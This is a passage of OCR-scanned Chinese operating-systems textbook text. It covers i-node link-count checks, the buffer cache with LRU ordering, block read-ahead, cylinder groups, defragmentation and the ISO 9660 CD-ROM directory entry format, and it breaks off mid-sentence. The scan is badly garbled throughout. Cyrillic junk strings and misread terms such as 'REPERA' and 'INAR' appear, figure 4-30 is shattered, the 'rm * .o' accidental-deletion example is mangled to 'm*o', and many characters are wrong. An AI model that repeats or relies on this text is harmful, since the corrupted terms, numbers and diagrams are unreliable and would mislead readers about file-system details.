检验 程序 将 这 些 数字 与 存储 在 文件 i 节 点 中 的 连接 数目 相 比较 。 当 文件 创建 时 ， 这 些 计 数 器 从 1 开始 ， 随 
着 每 次 对 文件 的 一 个 〈 硬 ) 连接 的 产生 ， 对 应 计数 器 加 1。 如 果 文件 系统 一 致 ， 这 两 个 计数 应 相等 。 但 
是 ， 有 可 能 出 现 两 种 错误 ， 即 节点 中 的 连接 计数 太 大 或 者 太 小 。 

如 果 i 节 点 的 连接 计数 大 于 目录 项 个 数 ， 这 时 即使 所 有 的 文件 都 从 目录 中 删除 ， 这 个 计数 仍 是 非 0，i 
节点 不 会 被 删除 。 该 错误 并 不 严重 ， 却 因为 存在 不 属于 任何 目录 的 文件 而 浪费 了 磁盘 空间 。 为 改正 这 一 
错误 ， 可 以 把 和 节点 中 的 连接 计数 设 成 正确 值 。 

另 一 种 错误 则 是 潜在 的 灾难 。 如 果 同 一 个 文件 连接 两 个 目录 项 ， 但 其 i 节 点 连接 计数 只 为 1， 如 果 副 
除了 任何 一 个 目录 项 ,对 应 i 节点 连接 计数 变 为 0。 当 i 节点 计数 为 0 时 , 文件 系统 标志 该 i 节点 为 “未 使 用 ”， 
并 释放 其 全 部 块 。 这 会 导致 其 中 一 个 目录 指向 一 未 使 用 的 i 节 点 ， 而 很 有 可 能 其 块 马 上 就 被 分 配给 其 他 
文件 。 解 决 方法 同样 是 把 i 节 点 中 连接 计数 设 为 目录 项 的 实际 个 数值 。 

由 于 效率 上 的 考虑 ， 以 上 的 块 检查 和 目录 检查 经 常 被 集成 到 一 起 ( 即 仅 对 i 节 点 扫描 一 遍 )。 当 然 也 
有 一 些 其 他 检查 方法 。 例 如 ， 目 录 是 有 明确 格式 的 ， 包 含有 i 节点 数目 和 ASCII 文 件 名 ， 如 果菜 个 目录 的 i 
节点 编号 大 于 磁盘 中 i 节点 的 实际 数目 ， 说 明 这 个 目录 被 破坏 了 。 

再 有 ， 每 个 节点 都 有 一 个 访问 权限 项 。 一 些 访问 权限 是 合法 的 ， 但 是 很 怪异 ， 比 如 0007， 它 不 允 
许 文 件 所 有 者 及 所 在 用 户 组 的 成 员 进行 访问 ,而 其 他 的 用 户 却 可 以 读 、 写 、 执 行 此 文件 。 在 这 类 情况 下 ， 
有 必要 报告 系统 已 经 设置 了 其 他 用 户 权限 高 于 文件 所 有 者 权限 这 一 情况 。 拥 有 1000 多 个 目录 项 的 目录 也 
很 可 疑 。 为 超级 用 户 所 拥有 ， 但 放 在 用 户 目 录 下 ， 且 设置 了 SETUID 位 的 文件 ， 可 能 也 有 安全 问题 ， 
为 任何 用 户 执行 这 类 文件 都 需要 超级 用 户 的 权限 。 可 以 列 出 一 长 串 特 殊 的 情况 ， 尽 管 这 些 情况 合法 ， 但 
报告 给 用 户 却 是 有 必要 的 。 

以 上 讨论 了 防止 因 系统 崩溃 而 破坏 用 户 文件 的 问题 ， 某 一 些 文件 系统 也 防止 用 户 自身 的 误 操作 。 如 
果 用 户 想 输入 

rm *.о 
删除 全 部 以 .o 结 尾 的 文件 (编译 器 生成 的 目标 文件 )， 但 不 幸 键入 了 


m*o 
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(注意 ， 星 号 后 面 有 一 空格 ) ， 则 rm 命令 会 删除 全 部 当前 目录 中 的 文件 ， 然 后 报告 说 找 不 到 文件 .o。 在 
MS-DOS 和 一 些 其 他 系统 中 ， 文 件 的 删除 仅仅 是 在 对 应 目录 或 i 节 点 上 设置 某 一 位 ， 表 示 文 件 被 删除 ， 并 
没有 把 磁盘 块 返回 到 空闲 表 中 ， 直 到 确实 需要 时 才 这 样 做 。 所 以 ， 如 果 用 户 立 即 发 现 了 操作 错误 ， 可 以 
运行 特定 的 一 个 “撤销 删除 ”( 即 恢复 ) 实用 程序 恢复 被 删除 的 文件 。 在 Windows 中 ， 删除 的 文件 被 转 
移 到 回收 站 目录 中 (一 个 特别 的 目录 )， 稍 后 若 需 要 ， 可 以 从 那里 还 原文 件 。 当 然 ， 除非 文件 确实 从 回 
收 站 目录 中 删除 ， 否 则 不 会 释放 空间 。 


4.4.4 文件 系统 性 能 

访问 磁盘 比 访问 内 存 慢 得 多 。 读 内 存 中 一 个 32 位 字 大 概要 10ns。 从 硬盘 上 读 的 速度 大 约 超过 
100MB/s， 对 32 位 字 来 说 ， 大 约 要 慢 4 倍 ， 还 要 加 上 5~10ms 寻 道 时 间 ， 并 等 待 所 需 的 扇面 抵达 磁头 下 。 
如 果 只 需要 一 个 字 ， 内 存 访问 则 比 磁盘 访问 快 百 万 数量 级 。 考虑 到 访问 时 间 的 这 个 差异 ， 许 多 文件 系统 
采用 了 各 种 优化 措施 以 改善 性 能 。 本 节 我 们 将 介绍 其 中 三 种 方法 。 

1. ажи 

最 常用 的 减少 磁盘 访问 次 数 技术 是 块 高 速 比 存 (block cache) REPERA (buffer cache), 在 
本 书 中 ， 高 速 缓存 指 的 是 一 系列 的 块 ， 它 们 在 逻辑 上 属于 磁盘 ， 但 实际 上 基于 性 能 的 考虑 被 保存 在 内 存 中 。 

管理 高 速 缓存 有 不 同 的 算法 ， 常 用 的 算法 是 : 检查 全 部 的 读 请 求 ， 查看 在 高 速 缓存 中 是 否 有 所 需要 
的 块 。 如 果 存 在 ， 可 执行 读 操 作 而 无 须 访问 磁盘 。 如 果 该 块 不 在 高 速 缓存 中 ， 首 先 要 把 它 读 到 高 速 缓存 ， 
再 复制 到 所 需 地 方 。 之 后 ， 对 同一 个 块 的 请 求 都 通过 高 速 缓存 完成 。 

高 速 缓存 的 操作 如 图 4-28 所 示 。 由 于 在 高 速 缓存 中 有 许多 块 (通常 有 上 千 块 )， 所 以 需要 有 某 种 方 
法 快速 确定 所 需要 的 块 是 否 存在 。 常 用 方法 散 列表 前 端 (LRU) 后 端 (MRU) 
是 将 设备 和 磁盘 地 址 进行 散 列 操作 ， 然 后 ， 
在 散 列表 中 查找 结果 。 具 有 相同 散 列 值 的 块 
在 一 个 链表 中 连接 在 一 起 ， 这 样 就 可 以 沿 着 
冲突 链 查 找 其 他 块 。 

如 果 高 速 缓存 已 满 , 则 需要 调和 新 的 块 ， 
因此 ， 要 把 原来 的 某 一 块 调 出 高 速 缓存 (如 
果 要 调 出 的 块 在 上 次 调 入 以 后 修改 过 ， 则 要 
把 它 写 回 磁盘 )。 这 种 情况 与 分 页 非常 相似 ， 所 有 常用 的 页 面 置 换算 法 在 第 3 章 中 已 经 介绍 ， 例 如 FIFO 算 
法 、 第 二 次 机 会 算法 、LRU 算 法 等 ， 它 们 都 适用 于 高 速 缓存 。 与 分 页 相 比 ， 高 速 缓存 的 好 处 在 于 对 高 速 
缓存 的 引用 不 很 频繁 ， 所 以 按 精 确 的 LRU 有 顺序 在 链表 中 记录 全 部 的 块 是 可 行 的 。 

在 图 4-28 中 可 以 看 到 ， 除 了 散 列表 中 的 冲突 链 之 外 ， 还 有 一 个 双向 链表 把 所 有 的 块 按照 使 用 时 间 的 
先后 次 序 链接 起 来 ， 近 来 使 用 最 少 的 块 在 该 链表 的 前 端 ， 而 近来 使 用 最 多 的 块 在 该 链表 的 后 端 。 当 引用 
某 个 块 时 ， 该 块 可 以 从 双向 链表 中 移 走 ， 并 放置 到 该 表 的 尾部 去 。 用 这 种 方法 ， 可 以 维护 一 种 准确 的 
LRU 顺 序 。 

但 是 ， 这 又 带 来 了 意 想 不 到 的 难题 。 现 在 存在 一 种 情形 ， 使 我 们 有 可 能 获得 精确 的 LRU， 但 是 碰巧 
该 LRU 却 又 不 符合 要 求 。 这 个 问题 与 前 一 节 讨论 的 系统 崩溃 和 文件 一 致 性 有 关 。 如 果 一 个 关键 块 (比如 
INAR) 读 进 了 高 速 缓存 并 做 过 修改 ， 但 是 没有 写 回 磁 盘 ， 这 时 ， 系统 崩溃 会 导致 文件 系统 的 不 一 至 
如 果 把 i 节 点 块 放 在 LRU 链 的 尾部 ， 在 它 到 达 链 首 并 写 回 磁盘 前 ， 有 可 能 需要 相当 长 的 一 段 时 间 。 

此 外 ， 某 一 些 块 ， 如 i 节 点 块 ， 极 少 可 能 在 短 时 间 内 被 引用 两 次 。 基于 这 些 考虑 需要 修改 LRU 方 案 ， 
并 应 注意 如 下 两 点 ; 

1) 这 一 块 是 否 不 久 后 会 再 次 使 用 ? 

2) 这 一 块 是 否 关 系 到 文件 系统 的 一 致 性 ? 

考虑 以 上 两 个 问题 时 ， 可 将 块 分 为 i 节 点 块 、 间 接 块 、 目 录 块 、 满 数据 块 、 部 分 数据 块 等 几 类 。 把 
有 可 能 最 近 不 再 需要 的 块 放 在 LRU 链 表 的 前 部 ， 而 不 是 LRU 链 表 的 后 端 ， 于 是 它们 所 占用 的 缓冲 区 可 以 
很 快 被 重用 。 对 很 快 就 可 能 再 次 使 用 的 块 ， 比如 正在 写 人 的 部 分 满 数据 块 ， 可 放 在 链表 的 尾部 ， 这 样 它 
们 能 在 高 速 缓存 中 保存 较 长 的 一 段 时 间 。 


图 4-28 缓冲 区 高 速 缓存 数据 结构 
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第 二 个 问题 独立 于 前 一 个 问题 。 如 果 关系 到 文件 系统 一 致 性 〈 除 数据 块 之 外 ， 其 他 块 基本 上 都 是 这 
PE) 的 某 块 被 修改 ， 都 应 立即 将 该 块 写 回 磁盘 ， 不 管 它 是 否 被 放 在 LRU 链 表 尾 部 。 将 关键 块 快速 写 回 磁 
盘 ， 将 大 大 减少 在 计算 机 崩溃 后 文件 系统 被 破坏 的 可 能 性 。 用 户 的 文件 崩溃 了 ， 该 用 户 会 不 高 兴 ， 但 是 
如 果 整 个 文件 系统 都 丢失 了 ， 那 么 这 个 用 户 会 更 生气 。 

尽管 用 这 类 方法 可 以 保证 文件 系统 一 致 性 不 受到 破坏 ， 但 我 们 仍然 不 希望 数据 块 在 高 速 缓存 中 放 很 
久之 后 才 写 人 磁盘 。 设 想 某 人 正在 用 个 人 计算 机 编写 一 本 书 。 尽 管 作者 让 编辑 程序 将 正在 编辑 的 文件 定 
期 写 回 磁盘 ， 所 有 的 内 容 只 存在 高 速 缓存 中 而 不 在 磁盘 上 的 可 能 性 仍然 非常 大 。 如 果 这 时 系统 崩溃 ， 文 
件 系 统 的 结构 并 不 会 被 破坏 ,但 他 一 整 天 的 工作 就 会 丢失 。 

即使 只 发 生 几 次 这 类 情况 ， 也 会 让 人 感到 不 愉快 。 系 统 采用 两 种 方法 解决 这 一 问题 。 在 UNIX 系 统 
中 有 一 个 系统 调用 sync， 它 强制 性 地 把 全 部 修改 过 的 块 立 即 写 回 磁盘 。 系 统 启动 时 ， 在 后 台 运 行 一 个 通 
常 名 为 update 的 程序 ， 它 在 无 限 循环 中 不 断 执行 sync 调 用 ， 每 两 次 调用 之 间 休 眠 30s。 于 是 ， 系 统 即使 
崩溃 ， 也 不 会 丢失 超过 30 秒 的 工作 。 

虽然 目前 Windows 有 一 个 等 价 于 sync 的 系统 调用 一 FlushFileBuffers， 不 过 过 去 没有 。 相 反 ， 
Windows 采 用 一 个 在 某 种 程度 上 比 UNIX 方 式 更 好 (有 了 时 更 坏 ) 的 策略 。 其 做 法 是 ， 只 要 被 写 进 高 速 组 
存 ， 就 把 每 个 被 修改 的 块 写 进 磁盘 。 将 缓存 中 所 有 被 修改 的 块 立 即 写 回 磁盘 称 为 通 写 高 速 缓存 (write- 
through cache)。 同 非 通 写 高 速 缓存 相 比 ， 通 写 高 速 缓存 需要 更 多 的 磁盘 IO。 

若 某 程序 要 写 满 IKB 的 块 ， 每 次 写 一 个 字符 ， 这 时 可 以 看 到 这 两 种 方法 的 区 别 。 UNIX 在 高 速 缓存 
中 保存 全 部 字符 ， 并 把 这 个 块 每 30 秒 写 回 磁盘 一 次 ,或 者 当 从 高 速 缓 存 删除 这 一 块 时 ， 写 回 磁 盘 。 在 通 
写 高 速 缓存 里 ， 每 写 人 一 字符 就 要 访问 一 次 磁盘 。 当 然 ， 多 数 程 序 有 内 部 缓冲 ， 通 常情 况 下 ， 在 每 次 执 
行 write 系统 调用 时 并 不 是 只 写 人 一 个 字符 ， 而 是 写 和 一行 或 更 大 的 单位 。 

采用 这 两 种 不 同 的 高 速 缓存 策略 的 结果 是 : 在 UNIX 系 统 中 ， 若 不 调用 sync 就 移动 ( 软 ) 磁盘 ， 往 
往 会 导致 数据 丢失 ， 在 被 毁坏 的 文件 系统 中 也 经 常 如 此 。 而 在 通 写 高 速 缓存 中 ， 就 不 会 出 现 这 类 情况 。 
选择 不 同 策略 的 原因 是 ， 在 UNIX 开 发 环境 中 ， 全 部 磁盘 都 是 硬盘 ， 不 可 移动 。 而 第 一 代 Windows 文件 
源 自 MS-DOS， 是 从 软盘 世界 中 发 展 起 来 的 。 由 于 UNIX 方 案 有 更 高 的 效率 它 成 为 当然 的 选择 (但 可 靠 
性 更 差 )， 随 着 硬盘 成 为 标准 ， 它 目前 也 用 在 Windows 的 磁盘 上 。 但 是 ， NTFS 使 用 其 他 方法 (日 志 ) 改 
善 其 可 靠 性 ， 这 在 前 面 已 经 讨论 过 。 

一 些 操作 系统 将 高 速 缓 存 与 页 缓存 集成 。 这 种 方式 特别 是 在 支持 内 存 映 射 文件 的 时 候 很 吸引 人 。 如 
果 一 个 文件 被 映射 到 内 存 上 ， 则 它 其 中 的 一 些 页 就 会 在 内 存 中 ， 因 为 它们 被 要 求 按 页 进入 。 这 些 页 面 与 
在 高 速 缓存 中 的 文件 块 几乎 没有 不 同 。 在 这 种 情况 下 ， 它 们 能 被 以 同样 的 方式 来 对 待 ， 也 就 是 说 ， 用 一 
个 缓存 来 同时 存储 文件 块 与 页 。 

2. 块 提前 读 

第 二 个 明显 提高 文件 系统 性 能 的 技术 是 : 在 需要 用 到 块 之 前 ， 试图 提前 将 其 写 入 高 速 缓存 ， 从 而 提 
高 命中 率 。 特 别 地 ， 许 多 文件 都 是 顺序 读 的 。 如 果 请 求 文件 系统 在 某 个 文件 中 生成 块 人 ， 文件 系统 执行 
相关 操作 且 在 完成 之 后 ， 会 在 用 户 不 察觉 的 情形 下 检查 高 速 缓存 ， 以 便 确定 块 :+1 是 否 已 经 在 高 速 缓存 。 
如 果 还 不 在 ,文件 系统 会 为 块 +1 安 排 一 个 预 读 ， 因 为 文件 系统 希望 在 需要 用 到 该 块 时 ， 它 已 经 在 高 速 
缓存 或 者 至 少 马上 就 要 在 高 速 缓存 中 了 。 

当然 ， 块 提前 读 策略 只 适用 于 顺序 读 取 的 文件 。 对 随机 存 取 文件 ， 提 前 读 丝毫 不 起 作用 。 相 反 ， 

它 还 会 帮 倒 忙 ， 因 为 读 取 无 用 的 块 以 及 从 高 速 缓存 中 删除 潜在 有 用 的 块 将 会 占用 固定 的 磁盘 带宽 (如果 
有 “ 脏 ” 块 的 话 ， 还 需要 将 它们 写 回 磁盘 ， 这 就 占用 了 更 多 的 磁盘 带宽 ) 。 那么 提前 读 策略 是 否 值得 采 
用 呢 ? 文件 系统 通过 跟踪 每 一 个 打开 文件 的 访问 方式 来 确定 这 一 点 。 例 如 ， 可 以 使 用 与 文件 相关 联 的 某 
个 位 协助 跟踪 该 文件 到 底 是 “顺序 存 取 方 式 ” 还 是 “随机 存 取 方式 ”。 在 最 初 不 能 确定 文件 属于 哪 种 存 
取 方 式 时 ， 先 将 该 位 设置 成 顺序 存 取 方式 。 但 是 ， 查 找 一 完成 ， 就 将 该 位 清除 。 如 果 再 次 发 生 顺 序 读 取 ， 
就 再 次 设置 该 位 。 这 样 ， 文 件 系统 可 以 通过 合理 的 猜测 ， 确 定 是 否 应 该 采取 提前 读 的 策略 。 即便 弄 错 了 
一 次 也 不 会 产生 严重 后 果 ， 不 过 是 浪费 一 小 段 磁盘 的 带宽 罢了 。 

3. 减少 磁盘 名 运动 

高 速 缓存 和 块 提前 读 并 不 是 提高 文件 系统 性 能 的 惟一 方法 。 另 一 种 重要 技术 是 把 有 可 能 顺序 存 取 的 
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НЕ, SAREE НЕТЕТ, MRDA RE. 当 写 一 个 输出 文件 时 ， 文 件 系 
统 就 必须 按照 要 求 一 次 一 次 地 分 配 磁盘 块 。 如 果 用 位 图 来 记录 空闲 块 ， 并 且 整 个 位 图 在 内 存 中 ， 那 么 选 
择 与 前 一 块 最 近 的 空闲 块 是 很 容易 的 。 如 果 用 空闲 表 ， 并 且 链表 的 一 部 分 存在 磁盘 上 ， 要 分 配 紧邻 着 的 
空闲 块 就 困难 得 多 。 

不 过 ， 即 使 采用 空闲 表 ， 也 可 以 采用 块 科 技术 。 这 里 用 到 一 个 小 技巧 ， 即 不 用 块 而 用 连续 块 抄 来 跟 
踪 磁 盘存 储 区 。 如 果 一 个 扇 区 有 512 个 字 节 ， 有 可 能 系统 采用 1KB 的 块 (2 个 扁 区 ) ， 但 却 按 每 2 块 (4 个 
DE) 一 个 单位 来 分 配 磁盘 存储 区 。 这 和 2KB 的 磁盘 块 并 不 相同 ， 因 为 在 高 速 缓存 中 它 依然 使 用 1KB 的 
块 ， 磁盘 与 内 存 数据 之 间 传 送 也 是 以 1KB 为 单位 进行 ， 但 在 一 个 空闲 的 系统 上 顺序 读 取 文件 ， 寻 道 的 次 
数 可 以 减少 一 半 ， 从 而 使 文件 系统 的 性 能 大 大 改善 。 车 考虑 旋转 定位 则 可 以 得 到 这 类 方案 的 变 体 。 在 分 
配 块 时 ， 系 统 尽量 把 . -个 文件 中 的 连续 块 存放 在 同一 柱 面 上 。 

在 使 用 i 节 点 或 任何 类 似 i 节 点 的 系统 中 ， 另 一 个 性 能 瓶颈 是 ， 读 取 一 个 很 短 的 文件 也 需要 两 次 磁盘 
访问 ， 一 次 是 访问 i 节点 ， 另 一 次 是 访问 块 。 通 常情 况 下 ， i 节点 的 放置 如 图 4-29a 所 示 。 其 中 ， 全 部 i 节点 
都 放 在 靠近 磁盘 开始 位 置 ， 所 以 i 节点 和 它 指向 的 块 之 间 的 平均 距离 是 柱 面 数 的 一 半 ， 这 将 需要 较 长 的 
寻 道 时 间 。 

кй 磁盘 被 划分 为 柱 面 组 ， 
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图 4-29 а) i 节 点 放 在 磁盘 开始 位 置 ，b) 磁盘 分 为 柱 面 组 ， 每 组 有 自 己 的 块 和 i 节 点 


一 个 简单 的 改进 方法 是 ， 在 磁盘 中 部 而 不 是 开始 处 存放 i 节点， 此 时 ， 在 i 节 点 和 第 一 块 之 间 的 平均 
寻 道 时 间 减 为 原来 的 一 半 。 另 一 种 做 法 是 ， 将 磁盘 分 成 多 个 柱 面 组 ， 每 个 柱 面 组 有 自 已 的 节点、 数据 
块 和 空闲 表 (McKusick 等 人 ，1984) ， 见 图 4-29b。 在 文件 创建 时 ， 可 选取 任 一 i 节点， 但 首先 在 该 节点 
所 在 的 柱 面 组 上 查找 块 。 如 果 在 该 柱 面 组 中 没有 空 闪 的 块 ， 就 选用 与 之 相 邻 的 柱 面 组 的 一 个 块 。 


445 磁盘 碎片 整理 

在 初始 安装 操作 系统 后 ， 从 磁盘 的 开始 位 置 ， 一 个 接 一 个 地 连续 安装 了 程序 与 文件 。 所 有 的 空闲 磁 
盘 空 间 放 在 一 个 单独 的 、 与 被 安装 的 文件 邻近 的 单元 里 。 但 随 着 时 间 的 流逝 ， 文件 被 不 断 地 创建 与 删除 ， 
于 是 磁盘 会 产生 很 多 雁 片 ， 文 件 与 空 穴 到 处 都 是 。 结 果 是 ， 当 创建 一 个 新 文件 时 ， 它 使 用 的 块 会 散布 在 
整个 磁盘 上 ， 造 成 性 能 的 降低 。 

磁盘 性 能 可 以 通过 如 下 方式 恢复 : 移动 文件 使 它们 相 邻 ， 并 把 所 有 的 (至 少 是 大 部 分 的 ) 空闲 空间 
帮 在 一 个 或 多 个 大 的 连续 的 区 域内 。 Windows 有 一 个 程序 defrag 就 是 从 事 这 个 工作 的 。Windows 的 用 户 
应 该 定期 使 用 它 。 

磁盘 碎片 整理 程序 会 在 一 个 在 分 区 末端 的 连续 区 域内 有 适量 空 闪 空 间 的 文件 系统 上 很 好 地 运行 。 这 
段 空间 会 允许 磁盘 碎片 整理 程序 选择 在 分 区 开始 端的 碎片 文件 ， 并 复制 它们 所 有 的 块 放 到 空闲 空间 内 。 
这 个 动作 在 磁盘 开始 处 释放 出 一 个 连续 的 块 空间 ， 这 样 原始 或 其 他 的 文件 可 以 在 其 中 相 邻 地 存放 。 这 个 
过 程 可 以 在 下 一 大 块 的 磁盘 空间 上 重复 ， 并 继续 下 去 。 

有 些 文件 不 能 被 移动 ， 包 括 页 文件 、 休 眠 文件 以 及 日 志 ， 因为 移动 这 些 文件 所 需 的 管理 成 本 要 大 于 
移动 它们 的 价值 。 在 一 些 系统 中 ， 这 些 文件 是 固定 大 小 的 连续 的 区 域 ， 因此 它们 不 需要 进行 碎片 整理 。 
这 类 文件 缺乏 灵活 性 会 造成 一 些 问题 ， 一 种 情况 是 ， 它们 恰好 在 分 区 的 末端 附近 并 且 用 户 想 减 小 分 区 的 
大 小 。 解 决 这 种 问题 的 惟一 的 方法 是 把 它们 一 起 删除 ， 改 变 分 区 的 大 小 ， 然后 再 重新 建立 它们 。 
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Linux 文 件 系统 (特别 是 ext2 和 ext3) 由 于 其 选择 磁盘 块 的 方式 ， 在 磁盘 碎片 整理 上 一 般 不 会 遭受 像 
Windows 那 样 的 困难 ， 因 此 很 少 需要 手动 的 磁盘 碎片 整理 。 


4.5 文件 系统 实例 

在 这 一 节 ， 我 们 将 讨论 文件 系统 的 几 个 实例 ， 包 括 从 相对 简单 的 文件 系统 到 十 分 复杂 的 文件 系统 。 
现代 流行 的 UNIX 文 件 系统 和 Windows Vista 自 带 文件 系统 在 本 书 的 第 10 章 和 第 11 章 有 详细 介绍 ， 在 此 就 
不 再 讨论 了 。 但 是 我 们 有 必要 来 看 看 这 些 文件 系统 的 前 身 。 


4.5.1 CD-ROM 文 件 系统 

作为 第 一 个 文件 系统 实例 ， 让 我 们 来 看 看 用 于 CD-ROM 的 文件 系统 。 因 为 这 些 文件 系统 是 为 一 次 性 
写 介质 设计 的 ， 所 以 非常 简单 。 例 如 ， 该 文件 系统 不 需要 记录 空闲 块 ， 这 是 因为 一 旦 光盘 生产 出 来 后 ， 
CD-ROM 上 的 文件 就 不 能 被 蓟 除 或 者 创建 了 。 下 面 我 们 来 看 看 主要 的 CD-ROM 文 件 系统 类 型 以 及 对 这 个 
文件 系统 的 两 种 扩展 。 

在 CD-ROM 出 现 一 些 年 后 ， 引 进 了 CD-R (可 记录 CD)。 不 像 CD-ROM，CD-R 可 以 在 初次 刻录 之 后 
加 文件 ， 但 只 能 简单 地 加 在 CD-R 的 最 后 面 。 文 件 不 能 删除 (尽管 可 以 更 新 目录 来 隐藏 已 存在 的 文件 ) 。 
因而 对 于 这 种 “只 能 添加 ”的 文件 系统 ， 其 基本 的 性 质 不 会 改变 。 特 别 地 ， 所 有 的 空闲 空间 放 在 了 CD 
末端 连续 的 一 大 块 内 。 

1.150 9660 文 件 系统 

最 普遍 的 一 种 CD-ROM 文 件 系统 的 标准 是 1988 年 被 采纳 的 名 为 ISO 9660 的 国际 标准 。 实 际 上 现在 市 
场 上 的 所 有 CD-ROM 都 支持 这 个 标准 ， 有 的 则 带 有 一 些 扩展 (下面 会 对 此 进行 讨论 ) 。 这 个 标准 的 一 个 
目标 就 是 使 CD-ROM 独 立 于 机 器 所 采用 的 字 节 顺序 和 使 用 的 操作 系统 ， 即 在 所 有 的 机 器 上 都 是 可 读 的 。 
因此 ， 在 该 文件 系统 上 加 上 了 一 些 限制 ， 使 得 最 弱 的 操作 系统 (如 MS-DOS) 也 能 读 取 该 文件 系统 。 

CD-ROM 没 有 和 磁盘 一 样 的 同心 柱 面 ， 而 是 沿 一 个 连续 的 螺旋 线 来 顺序 存储 信息 (当然 ， 跨 越 螺旋 
线 查 找 也 是 可 能 的 )。 螺 旋 上 的 位 序列 被 划分 成 大 小 为 2352 字 节 的 逻辑 块 (也 称 为 逻辑 扁 区 )。 这 些 块 有 
的 用 来 进行 引导 ， 有 的 用 来 进行 错误 纠正 或 者 其 他 一 些 用 途 。 每 个 逻辑 块 的 有 效 部 分 是 2048 字 节 。 当 用 
于 存放 音乐 时 ，CD 中 有 导 人 部 分 、 导 出 部 分 以 及 轨道 间 的 间隙， 但 是 用 于 存储 数据 的 CD-ROM 则 没有 
这 些 。 通 常 ， 螺 旋 上 的 逻辑 块 是 按 分 钟 或 者 秒 进行 分 配 的 。 通 过 转换 系数 1 秒 = 75 块 ， 则 可 以 转换 得 到 
相应 的 线性 块 号 。 

ISO 9660 支 持 的 CD-ROM 集 可 以 有 多 达 2”“-1 个 CD。 每 个 单独 的 CD-ROM 还 可 分 为 多 个 逻辑 卷 (分 
区 )。 下 面 我 们 重点 考虑 单个 没有 分 区 CD-ROM 时 的 ISO 9660, 

每 个 CD-ROM 有 16 块 作为 开始 ， 这 16 块 的 用 途 在 ISO 9660 标 准 中 没有 定义 。CD-ROM 制 造 商 可 以 在 
这 一 区 域 里 放 入 引导 程序 ， 使 计算 机 能 够 从 CD-ROM 引 导 ， 或 者 用 于 其 他 目的 。 接 下 来 的 一 块 存放 基本 
#48: (primary volume descriptor) ， 基 本 卷 描 述 符 包含 了 CD-ROM 的 一 些 基本 信息 。 这 些 信息 包 括 
系统 标识 符 (32 字 节 ) 、 卷 标识 符 (32 字 节 )、 发 布 标识 符 (128 字 节 ) 和 数据 预备 标识 符 (128 字 节 )。 
制造 商 可 以 在 上 面 的 几 个 域 中 填 人 需要 的 信息 ， 但 是 为 了 跨 平台 的 兼容 性 ， 不 能 使 用 大 写字 母 、 数 字 以 
及 很 少 一 部 分 标点 符号 。 

基本 卷 描述 符 还 包含 了 三 个 文件 的 名 字 ， 这 三 个 文件 分 别 用 来 存储 概述 、 版 权 声 明和 文献 信息 。 除 
此 之 外 ， 还 包含 有 一 些 关键 数字 信息 ,例如 逻辑 块 的 大 小 (通常 为 2048， 但 是 在 革 些 情况 下 可 以 是 4096、 
8192 或 者 更 大 ) 、CD-ROM 所 包含 的 块 数目 以 及 CD-ROM 的 创建 日 期 和 过 期 日 期 。 基 本 卷 描述 符 也 包含 
了 根 目录 的 目录 表 项 ， 说 明 根 目录 在 CD-ROM 的 位 置 ( 即 从 哪 一 块 开始 ) 。 从 这 个 根 目录 ， 系 统 就 能 找 
到 其 他 文件 所 在 的 位 置 。 

除 基本 卷 描述 符 之 外 ，CD-ROM 还 包含 有 一 个 补充 卷 描述 符 (supplementary volume descriptor), 
它 和 基本 卷 描述 符 包含 类 似 的 信息 ， 在 这 里 不 再 详细 讨论 。 

根 目录 和 所 有 的 其 他 目录 包含 可 变数 目的 目录 项 ， 目录 中 的 最 后 一 个 目录 项 有 一 位 用 于 标记 该 目录 
项 是 目录 中 的 最 后 一 个 。 目 录 项 本 身 也 是 长 度 可 变 的 。 每 一 个 目录 项 由 10 到 12 个 域 构 成 ， 其 中 一 些 域 是 
ASCII 域 ， 另 外 一 些 是 二 进 制 数字 域 。 二 进 制 域 被 编码 两 次 ， 一 个 用 于 低地 址 结尾 格式 (例如 在 Pentium 
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上 所 用 的 )， 一 个 用 于 高 地 址 结尾 格式 (例如 在 SPARC 上 所 用 的 )。 因 此 ， 一 个 16 位 的 数字 需要 4 个 字 节 ， 
一 个 32 位 的 数字 需要 8 个 字 节 。 

这 样 元 余 编 码 的 目的 主要 是 为 了 能 在 标准 发 展 的 同时 照顾 到 各 个 方面 的 利益 。 如 果 该 标准 仅 规定 低 
地 址 结尾 ， 那 么 在 产品 中 使 用 高 地 址 结尾 的 厂家 就 会 觉得 自己 受到 歧视 ， 就 不 会 接受 这 个 标准 。 所 以 我 
们 可 以 准确 地 用 元 余 的 字 节 /小 时 数 来 衡量 一 张 CD-ROM 的 情感 因素 。 

ISO 9660 目 录 项 的 格式 如 图 4-30 所 示 。 因 为 目录 项 是 长 度 可 变 的 ， 所 以 ， 第 一 个 域 就 说 明 这 一 项 的 
长 度 。 这 一 字 节 被 定义 为 高 位 在 左 ， 以 避免 混 清 。 


填充 
字 节 11 8 8 Е 12 4 1 4-15 { 
文件 位 置 | хїх® 日 期 和 时 间 | | [сь 4 文件 名 
cay A 8 
t 扩展 性 记录 长度 标志 位 一 


Сажа Ба, 


! 目 录 项 长 度 分 隔 
图 4-30 ISO 9660 的 目录 项 


目录 项 可 能 包含 有 扩展 属性 。 如 果 使 用 了 这 个 特性 ， 则 第 二 个 字 节 就 说 明 扩 展 属性 的 长 度 。 

接 下 来 是 文件 本 身 的 起 始 块 。 文 件 是 以 连续 块 的 方式 存储 的 ， 所 以 一 个 文件 的 位 置 完全 可 以 由 起 始 
块 的 位 置 和 大 小 来 确定 。 起 始 块 的 下 一 个 域 就 是 文件 大 小 。 

CD-ROM 的 日 期 和 时 间 被 记录 在 下 一 个 域 中 ， 其 中 分 隔 的 字 节 分 别 表示 年 、 月 、 日 、 小 时 、 分 钟 、 
秒 和 时 区 。 年 份 是 从 1900 年 开始 计数 的 ， 这 意味 着 CD-ROM 将 会 遇 到 2156 年 问题 ， 因 为 在 2155 年 之 后 将 
会 是 1900 年 。 如 果 定 义 初始 的 日 期 为 1988 年 (标准 通过 的 那 一 年 ) 的 话 ， 那 么 这 个 问题 就 可 以 推迟 88 年 
产生 ， 也 就 是 2244 年 。 

标志 位 域 包含 一 些 其 他 的 位 ， 包 括 一 个 用 来 在 打开 目录 时 隐藏 目录 项 (来 自 MS-DOS 的 特性 ) 的 标 
志 位 ， 一 个 用 以 区 分 该 项 是 文件 还 是 目录 的 标志 位 ， 一 个 用 以 标志 是 否 使 用 扩展 属性 的 标志 位 ， 以 及 一 
个 用 来 标志 该 项 是 否 为 目录 中 最 后 一 项 的 标志 位 。 其 他 一 些 标志 位 也 在 这 个 域 中 ， 但 是 在 此 我 们 不 再 讨 
